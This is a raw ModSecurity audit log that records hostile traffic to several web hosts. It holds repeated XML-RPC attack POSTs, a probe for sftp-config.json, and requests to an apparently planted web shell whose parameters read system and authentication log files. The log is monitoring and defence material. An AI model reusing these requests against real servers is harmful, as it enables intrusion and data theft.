Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --c05d132c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://3econcepts.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --c05d132c-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "3econcepts.cstechns.com"] [uri "/sftp-config.json"] [unique_id "aE7wIpK-05zbifgH_rQCjQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003746086648 538949 (- - -) Stopwatch2: 1750003746086648 538949; combined=2245, p1=602, p2=1524, p3=0, p4=0, p5=119, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c05d132c-Z-- --70106371-A-- [15/Jun/2025:21:39:57.174473 +0530] aE7wVOVVOp7UpcMHtmz5XgAAAAc 128.199.112.101 36746 127.0.0.1 7081 --70106371-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --70106371-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --70106371-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7wVOVVOp7UpcMHtmz5XgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003796218644 955915 (- - -) Stopwatch2: 1750003796218644 955915; combined=2466, p1=374, p2=1620, p3=53, p4=75, p5=216, sr=100, sw=128, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --70106371-Z-- --5f23fb28-A-- [15/Jun/2025:21:40:57.285994 +0530] aE7wkBLQPChAjmM6-0i0AgAAAAQ 128.199.112.101 44730 127.0.0.1 7081 --5f23fb28-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --5f23fb28-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5f23fb28-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7wkBLQPChAjmM6-0i0AgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003856306008 980042 (- - -) Stopwatch2: 1750003856306008 980042; combined=2385, p1=389, p2=1589, p3=43, p4=76, p5=180, sr=123, sw=108, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5f23fb28-Z-- --f83b3c26-A-- [15/Jun/2025:21:41:57.171653 +0530] aE7wzDtuDRGAAnNiXIebggAAAAg 128.199.112.101 49328 127.0.0.1 7081 --f83b3c26-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f83b3c26-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f83b3c26-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7wzDtuDRGAAnNiXIebggAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003916204923 966804 (- - -) Stopwatch2: 1750003916204923 966804; combined=2467, p1=373, p2=1639, p3=53, p4=70, p5=215, sr=96, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f83b3c26-Z-- --875c2c45-A-- [15/Jun/2025:21:42:57.399392 +0530] aE7xCBLQPChAjmM6-0i0SwAAAAQ 128.199.112.101 51264 127.0.0.1 7081 --875c2c45-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --875c2c45-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --875c2c45-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7xCBLQPChAjmM6-0i0SwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003976464888 934560 (- - -) Stopwatch2: 1750003976464888 934560; combined=2036, p1=362, p2=1294, p3=41, p4=60, p5=174, sr=99, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --875c2c45-Z-- --e2c62302-A-- [15/Jun/2025:21:43:01.252098 +0530] aE7xDRLQPChAjmM6-0i0TQAAAAQ 54.225.81.20 54490 127.0.0.1 7081 --e2c62302-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/skel&viewfile=//etc/skel/.bash_logout HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.225.81.20 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --e2c62302-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3097 Connection: close Content-Type: text/html; charset=UTF-8 --e2c62302-H-- Message: Warning. Matched phrase ".bash_logout" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bash_logout found within ARGS:viewfile: /etc/skel/.bash_logout"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".bash_logout" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bash_logout found within ARGS:viewfile: /etc/skel/.bash_logout"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7xDRLQPChAjmM6-0i0TQAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750003981166115 86043 (- - -) Stopwatch2: 1750003981166115 86043; combined=164649, p1=351, p2=2263, p3=56, p4=47, p5=81005, sr=87, sw=0, l=0, gc=80927 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2c62302-Z-- --ddce5f6c-A-- [15/Jun/2025:21:43:51.733910 +0530] aE7xP759833JshVCMq_W_gAAAAY 100.25.120.246 58638 127.0.0.1 7081 --ddce5f6c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/profile.d&viewfile=//etc/profile.d/nodenv.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 100.25.120.246 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --ddce5f6c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3137 Connection: close Content-Type: text/html; charset=UTF-8 --ddce5f6c-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/nodenv.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7xP759833JshVCMq_W_gAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/nodenv.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7xP759833JshVCMq_W_gAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750004031729689 4273 (- - -) Stopwatch2: 1750004031729689 4273; combined=2384, p1=363, p2=1832, p3=37, p4=41, p5=111, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ddce5f6c-Z-- --7459bb11-A-- [15/Jun/2025:21:43:57.170187 +0530] aE7xRDNzfFBMRkII6hmm9gAAAAI 128.199.112.101 58930 127.0.0.1 7081 --7459bb11-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7459bb11-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7459bb11-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7xRDNzfFBMRkII6hmm9gAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004036216869 953374 (- - -) Stopwatch2: 1750004036216869 953374; combined=2069, p1=384, p2=1336, p3=35, p4=54, p5=162, sr=120, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7459bb11-Z-- --c4efa346-A-- [15/Jun/2025:21:44:11.721682 +0530] aE7xUzNzfFBMRkII6hmm_QAAAAI 54.80.73.122 60520 127.0.0.1 7081 --c4efa346-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/kern.log.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.80.73.122 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c4efa346-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --c4efa346-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7xUzNzfFBMRkII6hmm_QAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750004051718058 3684 (- - -) Stopwatch2: 1750004051718058 3684; combined=1944, p1=328, p2=1498, p3=34, p4=31, p5=53, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c4efa346-Z-- --8dde5e3d-A-- [15/Jun/2025:21:44:57.367001 +0530] aE7xgN40YvvHR2Fi0mND6gAAAAk 128.199.112.101 40906 127.0.0.1 7081 --8dde5e3d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --8dde5e3d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --8dde5e3d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7xgN40YvvHR2Fi0mND6gAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004096481645 885411 (- - -) Stopwatch2: 1750004096481645 885411; combined=2468, p1=379, p2=1717, p3=41, p4=56, p5=172, sr=102, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8dde5e3d-Z-- --09be892c-A-- [15/Jun/2025:21:45:21.570477 +0530] aE7xmRLQPChAjmM6-0i0sAAAAAQ 23.23.99.55 42298 127.0.0.1 7081 --09be892c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/auth.log.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.23.99.55 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --09be892c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --09be892c-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7xmRLQPChAjmM6-0i0sAAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750004121565225 5314 (- - -) Stopwatch2: 1750004121565225 5314; combined=3120, p1=475, p2=2503, p3=50, p4=39, p5=53, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --09be892c-Z-- --c149b142-A-- [15/Jun/2025:21:45:57.189549 +0530] aE7xvLELSBhs7IymaYRLrAAAAAM 128.199.112.101 38820 127.0.0.1 7081 --c149b142-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --c149b142-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c149b142-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7xvLELSBhs7IymaYRLrAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004156245602 944003 (- - -) Stopwatch2: 1750004156245602 944003; combined=2278, p1=401, p2=1509, p3=41, p4=61, p5=164, sr=94, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c149b142-Z-- --adffe936-A-- [15/Jun/2025:21:46:57.615183 +0530] aE7x-DtuDRGAAnNiXIecPwAAAAg 128.199.112.101 38390 127.0.0.1 7081 --adffe936-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --adffe936-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --adffe936-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7x-DtuDRGAAnNiXIecPwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004216691133 924149 (- - -) Stopwatch2: 1750004216691133 924149; combined=2397, p1=373, p2=1506, p3=52, p4=84, p5=236, sr=101, sw=146, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --adffe936-Z-- --9a6c907c-A-- [15/Jun/2025:21:47:58.056826 +0530] aE7yNTtuDRGAAnNiXIecXwAAAAg 128.199.112.101 58010 127.0.0.1 7081 --9a6c907c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 506 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --9a6c907c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9a6c907c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] 